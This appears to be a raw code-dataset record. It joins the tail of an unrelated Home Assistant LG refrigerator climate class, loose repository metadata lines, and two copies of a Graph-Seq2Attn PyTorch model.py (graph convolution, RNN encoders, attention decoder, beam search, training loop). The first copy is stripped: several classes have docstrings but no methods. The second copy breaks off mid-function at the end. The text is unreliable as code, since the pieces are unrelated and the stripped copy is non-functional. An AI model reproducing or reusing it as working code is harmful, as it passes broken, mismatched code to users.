api: LGEDevice, description: ThinQRefClimateEntityDescription, ) -> None: """Initialize the climate.""" super().__init__(api) self._wrap_device = LGERefrigeratorDevice(api) self.entity_description = description self._attr_name = get_entity_name(api, description.key, description.name) self._attr_unique_id = f"{api.unique_id}-{description.key}-AC" self._attr_hvac_modes = [HVACMode.AUTO] self._attr_hvac_mode = HVACMode.AUTO @property def supported_features(self) -> int: """Return the list of supported features.""" if not self._wrap_device.device.set_values_allowed: return 0 return ClimateEntityFeature.TARGET_TEMPERATURE @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._wrap_device.device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._api.state: unit = self._api.state.temp_unit return TEMP_UNIT_LOOKUP.get(unit, TEMP_CELSIUS) return TEMP_CELSIUS @property def current_temperature(self) -> float | None: """Return the current temperature.""" curr_temp = self.entity_description.temp_fn(self._wrap_device) if curr_temp is None: return None try: return int(curr_temp) except ValueError: return None @property def target_temperature(self) -> float | None: """Return the temperature we try to reach.""" return self.current_temperature async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if new_temp := kwargs.get(ATTR_TEMPERATURE): await self.entity_description.set_temp_fn(self._wrap_device, new_temp) @property def min_temp(self) -> float: """Return the minimum temperature.""" return self.entity_description.range_temp_fn(self._wrap_device)[0] @property def max_temp(self) -> float: return self.entity_description.range_temp_fn(self._wrap_device)[1]
168
0
52
bc9f8efdc0e855ffa8421ab4eb5c22778be09608
34,764
py
Python
model.py
xuefei1/Graph-Seq2Attn
336c69877e483c95d9996ee205d2a005342f08af
[ "MIT" ]
1
2020-01-06T07:49:46.000Z
2020-01-06T07:49:46.000Z
model.py
xuefei1/Graph-Seq2Attn
336c69877e483c95d9996ee205d2a005342f08af
[ "MIT" ]
1
2020-04-16T10:15:27.000Z
2020-04-16T16:41:42.000Z
model.py
xuefei1/Graph-Seq2Attn
336c69877e483c95d9996ee205d2a005342f08af
[ "MIT" ]
null
null
null
import copy import math import time import torch import torch.nn as nn import numpy as np from constants import * from embeddings import * from tqdm import tqdm from utils.model_utils import device, model_checkpoint from utils.misc_utils import write_line_to_file from utils.lang_utils import make_std_mask from evaluate import corpus_eval def clones(module, n): "Produce n identical layers." return nn.ModuleList([copy.deepcopy(module) for _ in range(n)]) def attention(query, key, value, mask=None, dropout=None): "Compute 'Scaled Dot Product Attention'" d_k = query.size(-1) scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k) # batch_size x n_heads x seq_len x seq_len, i.e. attn score on each word if mask is not None: scores = scores.masked_fill(mask == 0, -1e9) p_attn = torch.softmax(scores, dim=-1) # batch_size x n_heads x seq_len x seq_len, softmax on last dimension, i.e. 3rd dimension attend on 4th dimension if dropout is not None: p_attn = dropout(p_attn) return torch.matmul(p_attn, value), p_attn # attended output, attention vec class NoamOpt: "Optim wrapper that implements rate." def step(self): "Update parameters and rate" self._step += 1 rate = self.rate() for p in self.optimizer.param_groups: p['lr'] = rate self._rate = rate self.optimizer.step() def rate(self, step=None): "Implement `lrate` above" if step is None: step = self._step return self.factor * \ (self.model_size ** (-0.5) * min(step ** (-0.5), step * self.warmup ** (-1.5))) class LabelSmoothing(nn.Module): "Label smoothing actually starts to penalize the model if it gets very confident about a given choice" class LayerNorm(nn.Module): "Construct a layernorm module (See citation for details)." class PositionwiseFeedForward(nn.Module): "Implements FFN equation." class SublayerConnection(nn.Module): """ A residual connection followed by a layer norm. """ def forward(self, x, sublayer_func): "Apply residual connection to any sublayer with the same size." layer_output = sublayer_func(x) residual_rv = x + self.dropout(layer_output) return self.norm(residual_rv) class PositionalEncoding(nn.Module): "Implement the PE function." class GCN(nn.Module): """ A GCN/Contextualized GCN module operated on dependency graphs. """ def forward(self, gcn_inputs, adj): """ :param adj: batch_size * num_vertex * num_vertex :param gcn_inputs: batch_size * num_vertex * input_dim :return: gcn_outputs: list of batch_size * num_vertex * hidden_dim mask: batch_size * num_vertex * 1. In mask, 1 denotes this vertex is PAD vertex, 0 denotes true vertex. """ # use out degree, assume undirected graph denom = adj.sum(2).unsqueeze(2) + 1 adj_mask = (adj.sum(2) + adj.sum(1)).eq(0).unsqueeze(2) gcn_outputs = [] for l in range(self.num_layers): Ax = adj.bmm(gcn_inputs) AxW = self.W[l](Ax) AxW = AxW + self.W[l](gcn_inputs) # self loop AxW = AxW / denom gAxW = torch.relu(AxW) gcn_inputs = self.gcn_drop(gAxW) if l < self.num_layers - 1 else gAxW gcn_outputs.append(gcn_inputs) return gcn_outputs, adj_mask class Generator(nn.Module): "Define standard linear + softmax generation step."
45.984127
156
0.631544
import copy import math import time import torch import torch.nn as nn import numpy as np from constants import * from embeddings import * from tqdm import tqdm from utils.model_utils import device, model_checkpoint from utils.misc_utils import write_line_to_file from utils.lang_utils import make_std_mask from evaluate import corpus_eval def clones(module, n): "Produce n identical layers." return nn.ModuleList([copy.deepcopy(module) for _ in range(n)]) def build_sents_mask(data_dict, pad_idx=0, eos_idx=3): batch_sents_list = data_dict[DK_DOC_SENTS_WID] batch_size = data_dict[DK_BATCH_SIZE] batch_sents_mask = torch.ones(batch_size, 1, len(batch_sents_list)).type(torch.ByteTensor).to(device()) for si, src in enumerate(batch_sents_list): assert src.shape[0] == batch_size src = src.to(device()) if pad_idx is not None: b_exc_pad = (src != pad_idx) else: b_exc_pad = torch.ones(src.size()).type(torch.BoolTensor).to(device()) if eos_idx is not None: b_exc_eos = (src != eos_idx) else: b_exc_eos = torch.ones(src.size()).type(torch.BoolTensor).to(device()) b_exc_both = b_exc_pad & b_exc_eos b_exc_aggr = b_exc_both.sum(1) mask_vals = (b_exc_aggr != 0) batch_sents_mask[:, 0, si] = mask_vals return batch_sents_mask.to(device()) def attention(query, key, value, mask=None, dropout=None): "Compute 'Scaled Dot Product Attention'" d_k = query.size(-1) scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k) # batch_size x n_heads x seq_len x seq_len, i.e. attn score on each word if mask is not None: scores = scores.masked_fill(mask == 0, -1e9) p_attn = torch.softmax(scores, dim=-1) # batch_size x n_heads x seq_len x seq_len, softmax on last dimension, i.e. 3rd dimension attend on 4th dimension if dropout is not None: p_attn = dropout(p_attn) return torch.matmul(p_attn, value), p_attn # attended output, attention vec class NoamOpt: "Optim wrapper that implements rate." def __init__(self, model_size, factor, warmup, optimizer): self.optimizer = optimizer self._step = 0 self.warmup = warmup self.factor = factor self.model_size = model_size self._rate = 0 def step(self): "Update parameters and rate" self._step += 1 rate = self.rate() for p in self.optimizer.param_groups: p['lr'] = rate self._rate = rate self.optimizer.step() def rate(self, step=None): "Implement `lrate` above" if step is None: step = self._step return self.factor * \ (self.model_size ** (-0.5) * min(step ** (-0.5), step * self.warmup ** (-1.5))) def zero_grad(self): self.optimizer.zero_grad() def state_dict(self): rv = {} rv["_step"] = self._step rv["warmup"] = self.warmup rv["factor"] = self.factor rv["model_size"] = self.model_size rv["_rate"] = self._rate rv["opt_state_dict"] = self.optimizer.state_dict() return rv def load_state_dict(self, state_dict): self._step = state_dict["_step"] self.warmup = state_dict["warmup"] self.factor = state_dict["factor"] self.model_size = state_dict["model_size"] self._rate = state_dict["_rate"] self.optimizer.load_state_dict(state_dict["opt_state_dict"]) for state in self.optimizer.state.values(): for k, v in state.items(): if isinstance(v, torch.Tensor): state[k] = v.to(device()) class LabelSmoothing(nn.Module): "Label smoothing actually starts to penalize the model if it gets very confident about a given choice" def __init__(self, size, padding_idx, smoothing=0.0): super(LabelSmoothing, self).__init__() self.criterion = nn.KLDivLoss(reduction="sum") self.padding_idx = padding_idx self.confidence = 1.0 - smoothing self.smoothing = smoothing self.size = size def forward(self, x, target): assert x.size(1) == self.size x = x.to(device()) target = target.to(device()) true_dist = x.data.clone() true_dist.fill_(self.smoothing / (self.size - 2)) indices = target.data.unsqueeze(1) true_dist.scatter_(1, indices, self.confidence) true_dist[:, self.padding_idx] = 0 mask = torch.nonzero(target.data == self.padding_idx) if mask.shape[0] > 0: true_dist.index_fill_(0, mask.squeeze(), 0.0) return self.criterion(x, true_dist) class GraphSeq2Attn(nn.Module): def __init__(self, doc_gcn_kw_embed, doc_gcn_merge_embed, doc_sents_wid_embed, tgt_wid_embed, doc_merge_gcn, doc_kw_dist_gcn, sents_encoder, ctx_encoder, pool, decoder, generator, pad_idx=0, sos_idx=2, eos_idx=3): super(GraphSeq2Attn, self).__init__() self.doc_gcn_kw_embed = doc_gcn_kw_embed self.doc_gcn_merge_embed = doc_gcn_merge_embed self.doc_sents_wid_embed = doc_sents_wid_embed self.tgt_wid_embed = tgt_wid_embed self.doc_merge_gcn = doc_merge_gcn self.doc_kw_dist_gcn = doc_kw_dist_gcn self.sents_encoder = sents_encoder self.ctx_encoder = ctx_encoder self.pool = pool self.decoder = decoder self.generator = generator self.pad_idx = pad_idx self.sos_idx = sos_idx self.eos_idx = eos_idx def forward(self, data_dict): sos = torch.ones(1, 1).type(torch.LongTensor).fill_(self.sos_idx).repeat(data_dict[DK_BATCH_SIZE], 1).to(device()) tgt = data_dict[DK_TGT_GEN_WID].to(device()) tgt = torch.cat([sos, tgt], dim=1) tgt = tgt[:, :-1] tgt_mask = make_std_mask(tgt, self.pad_idx) enc_list = self.encode(data_dict) decoder_out = self.decode(tgt, tgt_mask, enc_list) g_probs = self.generator(decoder_out) return g_probs def encode(self, data_dict): sents_encoded = [] batch_sents_list = data_dict[DK_DOC_SENTS_WID] enc_hidden = None for src in batch_sents_list: src = src.to(device()) enc_op, enc_hidden = self.encode_seq(src, enc_hidden) sents_encoded.append(enc_op) sents_encoded = torch.cat(sents_encoded, dim=1) batch_sents_attn_mask = build_sents_mask(data_dict, pad_idx=self.pad_idx, eos_idx=self.eos_idx) doc_merge_embedded, doc_merge_adj, _ = self.doc_gcn_merge_embed(data_dict, sents_encoded) doc_merge_layer_outputs, _ = self.doc_merge_gcn(doc_merge_embedded, doc_merge_adj) doc_graph_out = doc_merge_layer_outputs[-1] kw_dist_embedded, kw_dist_adj, kw_dist_mask = self.doc_gcn_kw_embed(data_dict) kw_dist_layer_outputs, _ = self.doc_kw_dist_gcn(kw_dist_embedded, kw_dist_adj) kw_dist_out = kw_dist_layer_outputs[-1] sent_lens_mask = build_sents_mask(data_dict, pad_idx=self.pad_idx, eos_idx=None) sent_lens = sent_lens_mask.squeeze(1).sum(1) doc_encoded, _ = self.ctx_encoder(sents_encoded, sent_lens) rv = [(doc_encoded, batch_sents_attn_mask), (doc_graph_out, batch_sents_attn_mask), (kw_dist_out, kw_dist_mask)] return rv def encode_seq(self, src, encoder_hidden=None, encoder_cell=None): if self.sents_encoder.rnn_type.lower() == "lstm": encoder_hidden = (encoder_hidden, encoder_cell) src_lens = (src != self.pad_idx).sum(1).to(device()) src = self.doc_sents_wid_embed(src) encoder_op, encoder_hidden = self.sents_encoder(src, src_lens, encoder_hidden) return encoder_op[:,-1,:].unsqueeze(1), encoder_hidden def decode(self, tgt, tgt_mask, src_tup_list): tgt_embedded = self.tgt_wid_embed(tgt) mem_tup_list = [] for t in src_tup_list: mem = self.pool(t[0]) mem_mask = t[1] if mem_mask is not None and mem.shape[1] != mem_mask.shape[2]: mem_mask = None mem_tup_list.append((mem, mem_mask)) decoder_out = self.decoder(tgt_embedded, tgt_mask, mem_tup_list) # decoder_out = self.decoder(tgt_embedded, tgt_mask, src_tup_list) return decoder_out def predict(self, decoder_out, topk=1, topk_dim=2): decoder_out = decoder_out[:, -1, :].unsqueeze(1) prob = self.generator(decoder_out) val, indices = prob.topk(topk, dim=topk_dim) return prob, val, indices class MultiHeadedAttention(nn.Module): def __init__(self, h, d_model, dropout=0.0): "Take in model size and number of heads." super(MultiHeadedAttention, self).__init__() assert d_model % h == 0 # We assume d_v always equals d_k self.d_k = d_model // h # dimesion of keys should be constrained by model hidden size? self.h = h self.linears = clones(nn.Linear(d_model, d_model), 3) # d_model to d_model, attn key dimension downsize is achieved through reshaping self.attn = None self.dropout = nn.Dropout(p=dropout) self.last_ff = nn.Linear(d_model, d_model) def forward(self, query, key, value, mask=None): "Implements Figure 2" if mask is not None: # Same mask applied to all h heads. mask = mask.unsqueeze(1) nbatches = query.size(0) # 1) Do all the linear projections in batch from d_model => h x d_k # batch_size x seq_len x d_model => batch_size x n_heads x seq_len x d_k query, key, value = [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2) # batch_size x n_heads x seq_len x d_k for l, x in zip(self.linears, (query, key, value))] # 2) Apply attention on all the projected vectors in batch. # batch_size x n_heads x seq_len x d_k => batch_size x n_heads x seq_len x d_k x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout) # 3) "Concat" using a view and apply a final linear. # batch_size x n_heads x seq_len x d_k => batch_size x seq_len x d_model x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k) x = self.last_ff(x) return x class LayerNorm(nn.Module): "Construct a layernorm module (See citation for details)." def __init__(self, features, eps=1e-6): super(LayerNorm, self).__init__() self.a_2 = nn.Parameter(torch.ones(features)) self.b_2 = nn.Parameter(torch.zeros(features)) self.eps = eps def forward(self, x): mean = x.mean(-1, keepdim=True) std = x.std(-1, keepdim=True) return self.a_2 * (x - mean) / (std + self.eps) + self.b_2 class PositionwiseFeedForward(nn.Module): "Implements FFN equation." def __init__(self, d_model, d_ff, dropout=0.0): super(PositionwiseFeedForward, self).__init__() self.layer_1 = nn.Linear(d_model, d_ff) self.layer_2 = nn.Linear(d_ff, d_model) self.dropout = nn.Dropout(dropout) def forward(self, x): l1_output = torch.relu(self.layer_1(x)) l1_output = self.dropout(l1_output) l2_output = self.layer_2(l1_output) return l2_output class SublayerConnection(nn.Module): """ A residual connection followed by a layer norm. """ def __init__(self, size, dropout): super(SublayerConnection, self).__init__() self.norm = LayerNorm(size) self.dropout = nn.Dropout(dropout) def forward(self, x, sublayer_func): "Apply residual connection to any sublayer with the same size." layer_output = sublayer_func(x) residual_rv = x + self.dropout(layer_output) return self.norm(residual_rv) class SequentialDecoderLayer(nn.Module): def __init__(self, size, attn, pos_ff, dropout, n_parallel_units=1): super(SequentialDecoderLayer, self).__init__() c = copy.deepcopy self.size = size self.pos_ff = c(pos_ff) self.self_attn = c(attn) self.p_attns = clones(attn, n_parallel_units) self.n_parallel_units = n_parallel_units self.sublayer = SublayerConnection(size, dropout) def forward(self, tgt, tgt_mask, attn_in_tup_list): rv = self.sublayer(tgt, lambda q: self.self_attn(q, q, q, tgt_mask)) for i, t in enumerate(attn_in_tup_list): rv = self.sublayer(rv, lambda q: self.p_attns[i](q, t[0], t[0], t[1])) rv = self.sublayer(rv, self.pos_ff) return rv class SequentialDecoder(nn.Module): def __init__(self, d_model, layer, n, pos_embed=None): super(SequentialDecoder, self).__init__() self.d_model = d_model self.layers = clones(layer, n) self.pos_embed = copy.deepcopy(pos_embed) if pos_embed is not None else None def forward(self, tgt, tgt_mask, attn_in_tup_list): rv = tgt if self.pos_embed is not None: rv = self.pos_embed(rv) for layer in self.layers: rv = layer(rv, tgt_mask, attn_in_tup_list) return rv class PositionalEncoding(nn.Module): "Implement the PE function." def __init__(self, d_model, dropout=0.0, max_len=5000): super(PositionalEncoding, self).__init__() # Compute the positional encodings once in log space. pe = torch.zeros(max_len, d_model) position = torch.arange(0, max_len).type(torch.FloatTensor).unsqueeze(1) div_term = torch.exp(torch.arange(0, d_model, 2).type(torch.FloatTensor) * -(math.log(10000.0) / d_model)) pe[:, 0::2] = torch.sin(position * div_term) pe[:, 1::2] = torch.cos(position * div_term) pe = pe.unsqueeze(0) self.register_buffer('pe', pe) # mark as not learnable parameters, but still part of the state def forward(self, x, pe_expand_dim=None): encoding_vals = self.pe if pe_expand_dim is not None: encoding_vals = self.pe.unsqueeze(pe_expand_dim) x = x + encoding_vals[:, :x.size(1), :] # just reads the first seq_len positional embedding values return x class GCN(nn.Module): """ A GCN/Contextualized GCN module operated on dependency graphs. """ def __init__(self, input_dim, hidden_dim, output_dim, dropout=0.0, num_layers=2): super(GCN, self).__init__() self.num_layers = num_layers self.input_dim = input_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.gcn_drop = nn.Dropout(dropout) # gcn layer self.W = nn.ModuleList() for layer_idx in range(self.num_layers): input_dim = self.input_dim if layer_idx == 0 else self.hidden_dim output_dim = self.output_dim if layer_idx == self.num_layers-1 else self.hidden_dim self.W.append(nn.Linear(input_dim, output_dim)) def forward(self, gcn_inputs, adj): """ :param adj: batch_size * num_vertex * num_vertex :param gcn_inputs: batch_size * num_vertex * input_dim :return: gcn_outputs: list of batch_size * num_vertex * hidden_dim mask: batch_size * num_vertex * 1. In mask, 1 denotes this vertex is PAD vertex, 0 denotes true vertex. """ # use out degree, assume undirected graph denom = adj.sum(2).unsqueeze(2) + 1 adj_mask = (adj.sum(2) + adj.sum(1)).eq(0).unsqueeze(2) gcn_outputs = [] for l in range(self.num_layers): Ax = adj.bmm(gcn_inputs) AxW = self.W[l](Ax) AxW = AxW + self.W[l](gcn_inputs) # self loop AxW = AxW / denom gAxW = torch.relu(AxW) gcn_inputs = self.gcn_drop(gAxW) if l < self.num_layers - 1 else gAxW gcn_outputs.append(gcn_inputs) return gcn_outputs, adj_mask class EncoderRNN(nn.Module): def __init__(self, input_size, hidden_size, n_layers=1, rnn_dir=2, dropout_prob=0.0, rnn_type="gru"): super(EncoderRNN, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.n_layers = n_layers self.rnn_dir = rnn_dir self.rnn_type = rnn_type self.dropout_prob = dropout_prob if self.rnn_type == "lstm": self.rnn = nn.LSTM(input_size=self.input_size, hidden_size=self.hidden_size, num_layers=self.n_layers, dropout=self.dropout_prob if self.n_layers>1 else 0, batch_first=True, bidirectional=self.rnn_dir==2) else: self.rnn = nn.GRU(input_size=self.input_size, hidden_size=self.hidden_size, num_layers=self.n_layers, dropout=self.dropout_prob if self.n_layers>1 else 0, batch_first=True, bidirectional=self.rnn_dir==2) def forward(self, embedded, input_lengths, hidden=None): outputs, hidden = self.rnn(embedded, hidden) return outputs, hidden class SeqMaxPoolLayer(nn.Module): def __init__(self, d_model, max_pool_factor=2, min_seq_len=4, fill_val=-1e9): super(SeqMaxPoolLayer, self).__init__() self.min_seq_len = min_seq_len self.max_pool_factor = max_pool_factor self.d_model = d_model self.max_pool = nn.MaxPool1d(self.max_pool_factor, stride=self.max_pool_factor) self.fill_val = fill_val def pad_to_max_pool_size(self, x, fill_val=None): fill_val = self.fill_val if fill_val is None else fill_val if x.shape[1] <= self.min_seq_len or self.max_pool_factor <= 1: return x if x.shape[1] % self.max_pool_factor != 0: new_size = x.shape[1] + (self.max_pool_factor - x.shape[1] % self.max_pool_factor) padded = torch.zeros(x.shape[0], new_size, x.shape[2]).type(torch.FloatTensor).to(device()) padded.fill_(fill_val) padded[:, :x.shape[1], :] = x else: padded = x return padded def forward(self, x): padded_x = self.pad_to_max_pool_size(x) if x.shape[1] > self.min_seq_len: padded_x = padded_x.transpose(1, 2) padded_x = self.max_pool(padded_x) padded_x = padded_x.transpose(1, 2) return padded_x class Generator(nn.Module): "Define standard linear + softmax generation step." def __init__(self, d_model, vocab): super(Generator, self).__init__() self.proj = nn.Linear(d_model, vocab) def forward(self, x): logits = self.proj(x) probs = torch.log_softmax(logits, dim=-1) return probs class BeamSearchResult: def __init__(self, i2w, idx_in_batch, beam_width=4, sos_idx=2, eos_idx=3, gamma=0.0, len_norm=0.0): self.idx_in_batch = idx_in_batch self.beam_width = beam_width self.gamma = gamma self.len_norm = len_norm self.eos_idx = eos_idx sos = torch.ones(1,1).fill_(sos_idx).type(torch.LongTensor).to(device()) self.curr_candidates = [ (sos, 1.0, [], [i2w[sos_idx]]) ] self.completed_insts = [] self.done = False def update(self, probs, next_vals, next_wids, next_words): assert len(next_wids) == len(self.curr_candidates) next_candidates = [] for i, tup in enumerate(self.curr_candidates): prev_tgt = tup[0] score = tup[1] prev_prob_list = [t for t in tup[2]] prev_words = [t for t in tup[3]] preds = next_wids[i] vals = next_vals[i] pred_words = next_words[i] prev_prob_list.append(probs) for bi in range(len(preds)): wi = preds[bi] val = vals[bi] word = pred_words[bi] div_penalty = 0.0 if bi > 0: div_penalty = self.gamma * (bi+1) new_score = score + val - div_penalty new_tgt = torch.cat([prev_tgt, torch.ones(1,1).type(torch.LongTensor).fill_(wi).to(device())], dim=1) new_words = [w for w in prev_words] new_words.append(word) if wi == self.eos_idx: if self.len_norm > 0: length_penalty = (self.len_norm + new_tgt.shape[1]) / (self.len_norm + 1) new_score /= length_penalty ** self.len_norm else: new_score = new_score / new_tgt.shape[1] if new_tgt.shape[1] > 0 else new_score ppl = 0 # TODO: add perplexity later self.completed_insts.append((new_tgt, new_score, ppl, new_words)) else: next_candidates.append((new_tgt, new_score, prev_prob_list, new_words)) next_candidates = sorted(next_candidates, key=lambda t: t[1], reverse=True) next_candidates = next_candidates[:self.beam_width] self.curr_candidates = next_candidates self.done = len(self.curr_candidates) == 0 def get_curr_tgt(self): if len(self.curr_candidates) == 0: return None return torch.cat([tup[0] for tup in self.curr_candidates], dim=0).type(torch.LongTensor).to(device()) def get_curr_candidate_size(self): return len(self.curr_candidates) def collect_results(self, topk=1): for cand in self.curr_candidates: self.completed_insts.append((cand[0], cand[1], 0, cand[3])) self.completed_insts = sorted(self.completed_insts, key=lambda t: t[1], reverse=True) self.completed_insts = self.completed_insts[:self.beam_width] return self.completed_insts[:topk] def eval_graph_seq2attn(model, loader, params, desc="Eval"): start = time.time() exclude_tokens = [params.sos_token, params.eos_token, params.pad_token, ""] truth_rsp = [] gen_rsp = [] ofn = params.logs_dir + params.model_name + "_eval_out.txt" write_line_to_file("", ofn) for batch in tqdm(loader, mininterval=2, desc=desc, leave=False, ascii=True): batch = copy.deepcopy(batch) beam_rvs = graph_seq2attn_beam_decode_batch(model, batch, params.sos_idx, params.tgt_i2w, len_norm=params.bs_len_norm, gamma=params.bs_div_gamma, max_len=params.max_decoder_seq_len, beam_width=params.beam_width_eval) for bi in range(batch[DK_BATCH_SIZE]): best_rv = beam_rvs[bi][3] truth_rsp.append([[w for w in batch[DK_TGT_SEG_LISTS][bi] if w not in exclude_tokens]]) gen_rsp.append([w for w in best_rv if w not in exclude_tokens]) write_line_to_file("truth: " + " ".join([w for w in batch[DK_TGT_SEG_LISTS][bi] if w not in exclude_tokens]), ofn) write_line_to_file("pred: " + " ".join([w for w in best_rv if w not in exclude_tokens]), ofn) perf = corpus_eval(gen_rsp, truth_rsp) elapsed = time.time() - start info = "Eval result {} elapsed {}".format(str(perf), elapsed) print(info) write_line_to_file(info, params.logs_dir + params.model_name + "_train_info.txt") return perf[params.eval_metric] def make_graph_seq2attn_model(src_w2v_mat, tgt_w2v_mat, params, src_vocab_size, tgt_vocab_size, same_word_embedding=False): n_parallel_units = 3 n_heads = params.graph_seq2attn_num_attn_heads d_model_sent_enc = params.graph_seq2attn_encoder_hidden_size d_model_ctx_enc = params.graph_seq2attn_context_hidden_size d_model_decoder = params.graph_seq2attn_context_hidden_size * params.graph_seq2attn_context_rnn_dir # TODO: small issue here d_model_dec_pos_ff = int(params.graph_seq2attn_decoder_hidden_size * params.graph_seq2attn_decoder_ff_ratio) d_output_gcn = d_model_decoder dec_attn = MultiHeadedAttention(n_heads, d_model_decoder) dec_ff = PositionwiseFeedForward(d_model_decoder, d_model_dec_pos_ff) dec_word_pos = PositionalEncoding(d_model_decoder) # embeddings if src_w2v_mat is None: src_word_embed_layer = TrainableEmbedding(params.word_embedding_dim, src_vocab_size) else: src_word_embed_layer = PreTrainedWordEmbedding(src_w2v_mat, params.word_embedding_dim, allow_further_training=params.src_embed_further_training) if tgt_w2v_mat is None: tgt_word_embed_layer = TrainableEmbedding(params.word_embedding_dim, tgt_vocab_size) else: tgt_word_embed_layer = PreTrainedWordEmbedding(tgt_w2v_mat, params.word_embedding_dim, allow_further_training=params.tgt_embed_further_training) if same_word_embedding and src_vocab_size == tgt_vocab_size: tgt_word_embed_layer = src_word_embed_layer doc_gcn_kw_embed = DocGCNKWDistDictEmbedding(params.word_embedding_dim, src_word_embed_layer) doc_gcn_merge_embed = DocGCNDictMergeEmbedding() tgt_wid_embed = ResizeWrapperEmbedding(d_model_decoder, tgt_word_embed_layer) # high-level components doc_merge_gcn = GCN(d_model_sent_enc * params.graph_seq2attn_encoder_rnn_dir, params.graph_seq2attn_doc_merge_gcn_hidden_size, d_output_gcn, params.graph_seq2attn_doc_merge_gcn_dropout_prob, num_layers=params.graph_seq2attn_doc_merge_gcn_layers) doc_kw_dist_gcn = GCN(params.word_embedding_dim, params.graph_seq2attn_doc_kw_dist_gcn_hidden_size, d_output_gcn, params.graph_seq2attn_doc_kw_dist_gcn_dropout_prob, num_layers=params.graph_seq2attn_doc_kw_dist_gcn_layers) sent_encoder = EncoderRNN(params.word_embedding_dim, d_model_sent_enc, n_layers=params.graph_seq2attn_num_encoder_layers, dropout_prob=params.graph_seq2attn_encoder_dropout_prob, rnn_dir=params.graph_seq2attn_encoder_rnn_dir, rnn_type=params.graph_seq2attn_encoder_type) doc_encoder = EncoderRNN(d_model_sent_enc * params.graph_seq2attn_encoder_rnn_dir, d_model_ctx_enc, n_layers=params.graph_seq2attn_num_context_layers, dropout_prob=params.graph_seq2attn_context_dropout_prob, rnn_dir=params.graph_seq2attn_context_rnn_dir, rnn_type=params.graph_seq2attn_context_type) max_pool = SeqMaxPoolLayer(d_model_decoder, max_pool_factor=params.graph_seq2attn_pool_factor, min_seq_len=1) decoder_layer = SequentialDecoderLayer(d_model_decoder, dec_attn, dec_ff, params.graph_seq2attn_decoder_dropout_prob, n_parallel_units=n_parallel_units) decoder = SequentialDecoder(d_model_decoder, decoder_layer, params.graph_seq2attn_num_decoder_layers, pos_embed=dec_word_pos) generator = Generator(d_model_decoder, tgt_vocab_size) # model model = GraphSeq2Attn(doc_gcn_kw_embed, doc_gcn_merge_embed, src_word_embed_layer, tgt_wid_embed, doc_merge_gcn, doc_kw_dist_gcn, sent_encoder, doc_encoder, max_pool, decoder, generator, pad_idx=params.pad_idx, sos_idx=params.sos_idx, eos_idx=params.eos_idx) for p in filter(lambda pa: pa.requires_grad, model.parameters()): if p.dim() == 1: p.data.normal_(0, math.sqrt(6 / (1 + p.size(0)))) else: nn.init.xavier_normal_(p, math.sqrt(3)) return model def train_graph_seq2attn(params, model, train_loader, criterion_gen, optimizer, completed_epochs=0, dev_loader=None, best_eval_result=0, best_eval_epoch=0, past_eval_results=[], checkpoint=True): model = model.to(device()) criterion_gen = criterion_gen.to(device()) for epoch in range(params.epochs): report_epoch = epoch + completed_epochs + 1 model.train() run_graph_seq2attn_epoch(model, train_loader, criterion_gen, curr_epoch=report_epoch, optimizer=optimizer, max_grad_norm=params.max_gradient_norm, desc="Train", pad_idx=params.pad_idx, model_name=params.model_name, logs_dir=params.logs_dir) if dev_loader is not None: # fast eval model.eval() with torch.no_grad(): if report_epoch >= params.full_eval_start_epoch and \ report_epoch % params.full_eval_every_epoch == 0: # full eval eval_bleu_4 = eval_graph_seq2attn(model, dev_loader, params) if eval_bleu_4 > best_eval_result: best_eval_result = eval_bleu_4 best_eval_epoch = report_epoch print("Model best checkpoint with score {}".format(eval_bleu_4)) fn = params.saved_models_dir + params.model_name + "_best.pt" if checkpoint: model_checkpoint(fn, report_epoch, model, optimizer, params, past_eval_results, best_eval_result, best_eval_epoch) info = "Best {} so far {} from epoch {}".format(params.eval_metric, best_eval_result, best_eval_epoch) print(info) write_line_to_file(info, params.logs_dir + params.model_name + "_train_info.txt") if hasattr(optimizer, "update_learning_rate"): optimizer.update_learning_rate(eval_bleu_4) past_eval_results.append(eval_bleu_4) if len(past_eval_results) > params.past_eval_scores_considered: past_eval_results = past_eval_results[1:] fn = params.saved_models_dir + params.model_name + "_latest.pt" if checkpoint: model_checkpoint(fn, report_epoch, model, optimizer, params, past_eval_results, best_eval_result, best_eval_epoch) print("") return best_eval_result, best_eval_epoch def run_graph_seq2attn_epoch(model, loader, criterion, curr_epoch=0, max_grad_norm=5.0, optimizer=None, desc="Train", pad_idx=0, model_name="graph_seq2attn", logs_dir=""): start = time.time() total_tokens = 0 total_loss = 0 total_correct = 0 for batch in tqdm(loader, mininterval=2, desc=desc, leave=False, ascii=True): g_log_wid_probs = model(batch) gen_targets = batch[DK_TGT_GEN_WID].to(device()) n_tokens = batch[DK_TGT_N_TOKEN].item() g_log_wid_probs = g_log_wid_probs.view(-1, g_log_wid_probs.size(-1)) loss = criterion(g_log_wid_probs, gen_targets.contiguous().view(-1)) # compute acc tgt = copy.deepcopy(gen_targets.view(-1, 1).squeeze(1)) g_preds_i = copy.deepcopy(g_log_wid_probs.max(1)[1]) n_correct = g_preds_i.data.eq(tgt.data) n_correct = n_correct.masked_select(tgt.ne(pad_idx).data).sum() total_loss += loss.item() total_correct += n_correct.item() total_tokens += n_tokens if optimizer is not None: optimizer.zero_grad() loss.backward() nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), max_grad_norm) optimizer.step() if torch.isnan(loss).any(): assert False, "nan detected after step()" loss_report = total_loss / total_tokens acc = total_correct / total_tokens elapsed = time.time() - start info = desc + " epoch %d loss %f, acc %f ppl %f elapsed time %f" % (curr_epoch, loss_report, acc, math.exp(loss_report), elapsed) print(info) write_line_to_file(info, logs_dir + model_name + "_train_info.txt") return loss_report, acc def graph_seq2attn_beam_decode_batch(model, batch, start_idx, i2w, max_len, gamma=0.0, pad_idx=0, beam_width=4, eos_idx=3, len_norm=1.0, topk=1): batch_size = batch[DK_BATCH_SIZE] model = model.to(device()) enc_list = model.encode(batch) batch_results = [ BeamSearchResult(idx_in_batch=bi, i2w=i2w, beam_width=beam_width, sos_idx=start_idx, eos_idx=eos_idx, gamma=gamma, len_norm=len_norm) 